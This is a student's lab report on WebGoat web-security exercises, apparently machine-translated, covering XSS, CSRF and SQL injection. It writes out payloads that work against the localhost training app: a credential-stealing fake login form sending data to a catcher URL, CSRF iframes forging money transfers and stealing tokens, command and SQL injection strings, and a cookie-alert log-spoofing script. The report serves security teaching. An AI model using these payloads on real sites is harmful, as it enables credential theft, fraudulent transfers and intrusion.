20155201 Network attack and Defense technology Experiment Nine web Security Foundation

20155201 Network attack and Defense technology Experiment Nine web Security Foundation One, the practice content

• The objective of this practice is to understand the basic principles of commonly used network attack techniques. Webgoat the experiment in practice.

Ii. contents of the report: 1. Basic question answer 1) SQL injection attack principle, how to defend

• SQL injection means that the Web application does not judge the legality of user input data, and an attacker can add additional SQL statements at the end of a pre-defined query statement in a Web application in order to deceive the database server into executing unauthorized arbitrary queries, thereby further obtaining the corresponding data information.
• A typical approach to SQL injection attacks: To determine if an application has an injection vulnerability, to collect information, to determine the type of database, to reconstruct the original SQL statement according to the type of injection parameter, to guess the table name, field name, to get account information, to attack the web, or to prepare for the next attack.
• As for how to prevent SQL injection attacks, the first is to separate the normal user and the system administrator user's permissions, strengthen the validation of user input, eliminate the use of various symbols. Tests the contents of a string variable, accepting only the desired value. Rejects input that contains binary data, escape sequences, and comment characters. This helps prevent script injection and prevents certain buffer overflow attacks. Test the size and data type of the user input and enforce appropriate restrictions and conversions. This helps to prevent intentional buffer overflow, which is more effective in preventing injection attacks.

2) The principle of XSS attack, how to defend

• The XSS is also called the CSS (cross site script), which is an attack by the site. This is called XSS because it has the same name as the CSS cascading style sheet. It refers to a malicious attacker inserting malicious HTML code into a Web page, and when the user browses to the page, HTML code embedded inside the Web is executed to achieve the special purpose of the malicious user and to obtain some information about the user.
  XSS attacks can be divided into three types, storage and reflection and DOM, reflective attacks go through the back end, not through the database, storage type through the backend, through the database. DOM: Without the backend, the dom-based XSS vulnerability is a vulnerability based on Document Object model documents Objeet Model,dom), which is triggered by URL-passed parameters.
• If you want to defend against XSS attacks, you should strictly filter the required parameters before the form submission or URL parameters are passed, and check the user input for illegal content, such as angle brackets < , > quotation marks " , ‘ etc., strictly controlled.

3) CSRF attack principle, how to defend

• CSRF (Cross-site request forgery) cross-site requests forgery, also known as "one click Attack" or Session Riding, usually abbreviated as CSRF or XSRF, is a malicious use of the site. Although it sounds like cross-site scripting (XSS), it is very different from XSS, where XSS leverages trusted users within the site, while CSRF leverages trusted sites by disguising requests from trusted users. Compared to XSS attacks, csrf attacks are often less prevalent (and therefore have very few resources to protect against them) and are difficult to guard against, so they are considered more dangerous than XSS.
• There are some strategies for defending against CSRF attacks: Customizing properties in the HTTP header and validating them. Detect user Submissions by Referer, token, or verification code. Try not to expose user privacy information in the link to the page. It is best to use the post operation for actions such as user modification and deletion. Avoid general-purpose cookies and strictly set the domain of cookies.

2. Practice Summary and experience

Do the experiment when just finished the information system security, the last class to speak of SQL injection attack, this class talk about XSS attack, equivalent to review a wave, also has a new harvest, the experiment is over, knowledge left, feel wide to.

3. Practice Process Record

1. Cross-site scripting attacks XSS
2. Cross-site request forgery CSRF
3. SQL injection attacks

Cross-site scripting attacks XSS

1. Using XSS fishing (Phishing with XSS)
   • Use XSS and HTML insertions, insert HTML into request credentials, add JavaScript to actually collect credentials, publish request credentials to Http://localhost:8080/WebGoat/catcher?PROPERTY=yes ... Is this Google translate the language? I understand the meaning is that the source code of the HTML can be modified to generate an HTML containing the form, and write a JS implementation of the form submitted to the attacker, here with the pop-up window alert to do an example, since the pop-up window can do, then secretly data to the attacker is no problem.

   • The code is as follows:

     <script>function hack(){alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.forms[0].user.value + " Password = " + document.forms[0].pass.value); //将输入框里面的内容获取并显示XSSImage=new Image; XSSImage.src="http://localhost/WebGoat/catcher?PROPERTY=yes&user="+document.forms[0].user.value + "&password=" + document.forms[0].pass.value + "";} //将这些信息发送给捕获这些信息的WebGoat。</script><form><br><br><HR><H3>This feature requires account login:</H3><br><br>Enter Username:<br><input type="text" id="user" name="user"><br>Enter Password:<br><input type="password" name = "pass"><br><input type="submit" name="login" value="login" onclick="hack()"></form><br><HR>

   • Generated HTML Web page
   • Pop window Success

3. Storage-type XSS (Stored XSS)
   • "It's a good idea to delete all of the inputs, especially those that will later be used as parameters for OS commands, scripts, and database queries." It is especially important for content that is stored permanently in the application. Users should not be able to create message content that, when a user's message is retrieved, may cause another user to load unwelcome pages or content that cannot be designed. "Translation of a title, speaking of the meaning of the storage-type attack."

   • Enter a JS script in the input box, the script is inserted and stored in the HTML source code, when other users visit the site again, the script will run, a storage-type XSS attack is the case. Enter in the Message field <script>alert("haha20155201");</script> (actually I feel the beginning should add one "/> to terminate the text input box, but this is not the effect of writing). ), fill in the title bar after the submission, the following message bar will be more than the message you just added, click on it, you can see the evil script

5. Reflective XSS (reflected XSS)
   • When inserting a script in the input box, click Submit to see the effect immediately, the data to the background, is the reflection of XSS attack. Enter in the input box <script>alert("Dangerous");</script> , after submission you can see the pop-up window, indicating that we can also write a script to upload data to a URL or server?

CSRF attack

2. Cross-site request forgery (CSRF)
   • Cross-site request forgery is a means of attacking a victim to load a picture containing a webpage.
   • When the victim's browser tries to open the page, it uses the specified parameters to send the request to the page that contains the page. The browser thinks it will get a picture, but it is actually a money transfer function. This request will include any cookies associated with the website. Therefore, if a user has been authenticated through the website and has a persistent cookie, or even a cookie for the current session, the site will have no way to differentiate whether this is a request from a legitimate user. In this way, attackers can allow victims to perform actions that they did not intend to perform, such as logoff, purchase items, or any other functionality provided by this fragile website.
   • In this lesson, your goal is to send a message to a newsgroup that contains an image with a URL that points to a malicious request. Whoever receives the e-mail and happens to be authenticated, his funds will be transferred.
   • Embed HTML code in a message box that contains a picture that links to a Web site. Note screen and menu parameters on the right side of the site to view, everyone is not the same, about is localhost or 127.0.0.1, you landed on the webgoat when you use what is written here, the corresponding may not be able to do the problem.
   • After submission, you will see a new message. Click on it, the user's 5000 yuan will be transferred away, after the refresh can see this topic has been completed.
3. Bypass CSRF Confirmation (CSRF Prompt by‐pass)
   • All manually initiated request operations in the Web page, in essence, are initiated by Html+javascript to the server.
   • Our goal is to send an email message to the newsgroup with multiple threat requests. The first one asks for a user's money transfer, and the second is used to automatically process the acknowledgement triggered by the first request. The URL must use the following two external parameters of "transferfunds=4000" and "transferfunds=confirm". URL acquisition can be done by right-clicking the mouse in the left link and copying the shortcut. Any person who receives the e-mail will automatically complete the transfer of funds upon access to the page if it has been authenticated.
   • Similarly, the "screen" and "menu" parameters in the URLs of different webgoat environments may differ. Use the parameters that are being used in the current access URL.
   • Create a picture or IFRAME tag similar to the CSRF experiment: The picture request does not result in a transfer of funds, but rather triggers a message that requires user confirmation.

   • The code is as follows:

     <iframesrc="http://127.0.0.1:8080/WebGoat/attack?Screen=272&menu=900&transferFunds=5000" id="myFrame" frameborder="1" marginwidth="0"marginheight="0" width="800" scrolling=yes height="300" onload="document.getElementById(‘frame2‘).src=‘http://127.0.0.1:8080/WebGoat/attack?Screen=272&menu=900&transferFunds=CONFIRM‘;"> </iframe><iframeid="frame2" frameborder="1" marginwidth="0" marginheight="0" width="800" scrolling=yes height="300"></iframe>

   • The second request must be loaded at the end of the first request. So we need to add JS to implement automatically loading the second after the first request: Add the onload parameter to the property of the first frame, and set SRC to the second frame. Submit this code to the message box to post. After submission, you can see that the frame above shows the user confirmation message, which is the result of the previous request. The second frame shows the result of our forged confirmation request: $5000 has been transferred. Refresh the page to see the completed course.

   • For a picture, an error is triggered if an HTML is loaded. This is why you can replace the OnLoad property here for tool purposes.

   • Insert the code in the input box, click on the page after submitting the message, and pass after the refresh.
4. Bypass CSRF Token (CSRF token by-pass)
   • Cross-site request forgery attack (CSRF/XSRF) spoofing the acquired system trusts the user to click on a page with a forged request to execute the relevant command.
   • Request authentication based on token (token) is used to block such an attacker. This technique inserts tokens on the Request Initiation page. Token is used to complete the request and verify that the operation was not performed by script, and that all manually initiated requests in the Web page were made by Html+javascript to the server.
   • Similar to the CSRF course, your goal is to send an email with a malicious request to the newsgroup to implement a money transfer. In order to successfully complete the spoofing, you need to obtain a validation request Token. The URL that displays the transfer form is similar to the external parameter "Transferfunds=main" used in the CSRF course. Load the page, read the Token and append it to the forged request for money transfer. ”

   • View the form contents of the Funds transfer page generated by the site. http://127.0.0.1:8080/WebGoat/attack?Screen=296&menu=900&transferFunds=mainView the source code and see the token parameter

     <form accept-charset=‘UNKNOWN‘ id=‘transferForm‘ method=‘POST‘ action=‘#attack/296/900‘ enctype=‘application/x-www-form-urlencoded‘><input name=‘transferFunds‘ type=‘text‘ value=‘0‘><input name=‘CSRFToken‘ type=‘hidden‘ value=‘920130483‘><input type=‘submit‘></form>

   • From this you can see that the forged command needs to commit the Csrftoken parameter, load the page in an IFRAME, and read out tokens from the frame. See the source code below to find the Token parameter.

   • From the tutorial to find a section of code, through the path of Frame‐>form can read and save Csrftoken parameters.

   <script>var readToken = function(){var doc = document.getElementById("frame1").contentDocumentvar token = doc.getElementsByName("CSRFToken")[0].getAttribute("value");alert(token);var frame2 = document.getElementById("frame2");frame2.src = "http://127.0.0.1:8080/WebGoat/attack?Screen=296&menu=900&transferFunds=4000&CSRFToken="+token;}</script><iframe id="frame2" ></iframe><iframe id="frame1" onload="readToken()" src="http://127.0.0.1:8080/WebGoat/attack?Screen=296&menu=900&transferFunds=main" ></iframe>

   • When clicked, the Pop-up window displays tokens.

SQL injection attacks

2. Command Injection (injection)
   • In the normal parameter submission process, adding malicious code, often can get outside the harvest, such as the execution of system commands.
   • Click Firebug, which is the bug in the toolbar and debug the Web page source code.
   • Add to the requested page source code "& netstat -an & ipconfig" , where do you add it? Anywhere, the check box has an item, followed by a double quote, which executes the system command.
   • You can see the effect that the command produces:

4. Digital SQL injection (Numeric SQL injection)
   • By injecting feature characters into the station field, the group can synthesize new SQL statements. SELECT * FROM weather_data WHERE station = [station]to view all the weather data by injecting a SQL string.
   • First look at the non-attack situation, see what Colombia sees is the weather in Colombia.
   • This is very simple, also look at the source code, such as NewYork in the weather to value=103 add one or 1=1 , because 1=1 is an identity, plus or makes this SQL statement SELECT * FROM weather_data WHERE station = 103 or 1=1 , so that the right side of the equal sign is always set, will not find station =103 City Weather, direct Select all the weather in the city.
   • All the city's weather can be seen:

6. Logging Spoofing (log Spoofing)
   • The gray area represents the contents of the record in the Web server's log. Our goal is to use a user named "admin" in the log to display "successful login".
   • You can insert a script implementation in the log file.
   • Enter the user name in the text box so that the 5201 Login Succeeded for username admin user name information is displayed on the same line and is useless. If we can add a carriage return in this line and so on, it can become two lines, ah, add carriage return (0d%) and newline (%0a), filled in username 5201%0d%0aLogin Succeeded for username: admin , you can see that only one line has Login failed become two lines, the following is our evil purpose Login Succeded for username : admin .
   • This means that we can add a malicious script to the log file that the return information manager of the script can see through the browser.
   • admin <script>alert(document.cookie)</script>As the username input, the administrator can see the cookie information of the popup window.

8. string-type injection (string SQL injection)
   • Constructs your own SQL injection string based on the following query statement. SELECT * FROM user_data WHERE last_name = ‘?‘. Try to display all credit card information through SQL injection. The user name you tried is "Smith".
   • Enter the user name of the query Smith‘ or 1=1-- so that both Smith and 1=1 are the criteria for the query, and 1=1 is an identity so that all the data in the Select table is available.

20155201 network attack and Defense technology Experiment Nine web security Foundation